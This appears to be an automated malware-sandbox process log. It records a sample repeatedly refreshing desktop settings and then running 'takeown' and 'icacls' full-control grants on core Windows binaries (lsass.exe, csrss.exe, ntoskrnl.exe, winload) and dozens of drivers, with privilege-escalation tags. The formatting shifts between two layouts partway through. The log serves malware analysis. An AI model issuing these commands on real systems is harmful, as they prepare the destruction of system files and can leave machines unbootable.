C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2276
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:996
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3004
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1948
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1520
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2188
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1644
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:384
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:764
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe (PID 2612): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2272): takeown /f C:\Windows\System32\smss.exe
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1144): icacls C:\Windows\System32\smss.exe /grant "Admin:F"
        - Possible privilege escalation attempt
C:\Windows\System32\cmd.exe (PID 2352): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2972): takeown /f C:\Windows\System32\csrss.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 756): icacls C:\Windows\System32\csrss.exe /grant "Admin:F"
        - Possible privilege escalation attempt
C:\Windows\System32\cmd.exe (PID 2360): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2064): takeown /f C:\Windows\System32\wininit.exe
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 400): icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1228): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2448): takeown /f C:\Windows\System32\LogonUI.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2864): icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"
        - Possible privilege escalation attempt
C:\Windows\System32\cmd.exe (PID 2620): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2628): takeown /f C:\Windows\System32\lsass.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1212): icacls C:\Windows\System32\lsass.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1888): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1012): takeown /f C:\Windows\System32\services.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2956): icacls C:\Windows\System32\services.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2800): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2772): takeown /f C:\Windows\System32\winlogon.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 608): icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 312): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2760): takeown /f C:\Windows\System32\winload.efi
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2296): icacls C:\Windows\System32\winload.efi /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1740): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2696): takeown /f C:\Windows\System32\winload.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 788): icacls C:\Windows\System32\winload.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1516): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2464): takeown /f C:\Windows\System32\ntoskrnl.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2672): icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1472): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2548): takeown /f C:\Windows\System32\svchost.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 704): icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1876): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1792): takeown /f C:\Windows\SysWOW64\smss.exe
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 2852): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 268): takeown /f C:\Windows\SysWOW64\csrss.exe
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 1688): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1796): takeown /f C:\Windows\SysWOW64\wininit.exe
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 708): icacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1432): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1456): takeown /f C:\Windows\SysWOW64\LogonUI.exe
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 2908): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2912): takeown /f C:\Windows\SysWOW64\lsass.exe
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 972): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 568): takeown /f C:\Windows\SysWOW64\services.exe
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 1320): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2868): takeown /f C:\Windows\SysWOW64\winlogon.exe
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 2900): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2920): takeown /f C:\Windows\SysWOW64\winload.efi
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 1312): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 3048): takeown /f C:\Windows\SysWOW64\winload.exe
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\cmd.exe (PID 1648): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2276): takeown /f C:\Windows\SysWOW64\ntoskrnl.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1656): icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"
        - Possible privilege escalation attempt
C:\Windows\System32\cmd.exe (PID 2056): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2788): takeown /f C:\Windows\SysWOW64\svchost.exe
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1004): icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2596): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1548): takeown /f C:\Windows\System32\drivers\1394bus.sys
    C:\Windows\system32\icacls.exe (PID 1188): icacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 836): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 616): takeown /f C:\Windows\System32\drivers\1394ohci.sys
    C:\Windows\system32\icacls.exe (PID 736): icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 928): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2592): takeown /f C:\Windows\System32\drivers\acpi.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1968): icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 740): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2656): takeown /f C:\Windows\System32\drivers\acpipmi.sys
    C:\Windows\system32\icacls.exe (PID 1108): icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2632): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2976): takeown /f C:\Windows\System32\drivers\adp94xx.sys
    C:\Windows\system32\icacls.exe (PID 2572): icacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2188): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2804): takeown /f C:\Windows\System32\drivers\adpahci.sys
    C:\Windows\system32\icacls.exe (PID 1532): icacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2616): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2480): takeown /f C:\Windows\System32\drivers\adpu320.sys
    C:\Windows\system32\icacls.exe (PID 400): icacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 544): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1564): takeown /f C:\Windows\System32\drivers\afd.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2660): icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2212): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2620): takeown /f C:\Windows\System32\drivers\agilevpn.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1852): icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
C:\Windows\System32\cmd.exe (PID 2972): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2776): takeown /f C:\Windows\System32\drivers\AGP440.sys
    C:\Windows\system32\icacls.exe (PID 2496): icacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1960): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1856): takeown /f C:\Windows\System32\drivers\aliide.sys
    C:\Windows\system32\icacls.exe (PID 2488): icacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1620): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2984): takeown /f C:\Windows\System32\drivers\amdide.sys
    C:\Windows\system32\icacls.exe (PID 2876): icacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2608): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1624): takeown /f C:\Windows\System32\drivers\amdk8.sys
    C:\Windows\system32\icacls.exe (PID 2692): icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1756): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1580): takeown /f C:\Windows\System32\drivers\amdppm.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2516): icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1884): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2752): takeown /f C:\Windows\System32\drivers\amdsata.sys
    C:\Windows\system32\icacls.exe (PID 2812): icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1328): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1792): takeown /f C:\Windows\System32\drivers\amdsbs.sys
    C:\Windows\system32\icacls.exe (PID 2012): icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2844): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 3000): takeown /f C:\Windows\System32\drivers\amdxata.sys
    C:\Windows\system32\icacls.exe (PID 704): icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2800): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1704): takeown /f C:\Windows\System32\drivers\appid.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1712): icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1416): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 2304): takeown /f C:\Windows\System32\drivers\arc.sys
    C:\Windows\system32\icacls.exe (PID 3032): icacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 3036): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 976): takeown /f C:\Windows\System32\drivers\arcsas.sys
    C:\Windows\system32\icacls.exe (PID 1676): icacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"
        - Modifies file permissions
C:\Windows\System32\cmd.exe (PID 2256): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 332): takeown /f C:\Windows\System32\drivers\asyncmac.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 3028): icacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2184): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1448): takeown /f C:\Windows\System32\drivers\atapi.sys
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 616): icacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 1264): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 1808): takeown /f C:\Windows\System32\drivers\ataport.sys
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 2080): icacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe (PID 2544): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit
    C:\Windows\system32\takeown.exe (PID 384): takeown /f C:\Windows\System32\drivers\b57nd60a.sys
    C:\Windows\system32\icacls.exe: icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"
- Possible privilege escalation attempt
PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit2⤵PID:1632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\battc.sys3⤵PID:2592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit2⤵PID:1188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\beep.sys3⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit2⤵PID:2980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\blbdrive.sys3⤵
- Possible privilege escalation attempt
PID:752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit2⤵PID:2976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit2⤵PID:1628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltLo.sys3⤵PID:284
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit2⤵PID:2444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltUp.sys3⤵PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit2⤵PID:2780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bridge.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit2⤵PID:2808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerId.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2152
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"3⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit2⤵PID:1908
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerWdm.sys3⤵
- Modifies file permissions
PID:1460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit2⤵PID:2984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbMdm.sys3⤵
- Possible privilege escalation attempt
PID:2464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit2⤵PID:2876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbSer.sys3⤵PID:2828
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit2⤵PID:612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthmodem.sys3⤵PID:1892
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit2⤵PID:312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bxvbda.sys3⤵PID:1792
-
-
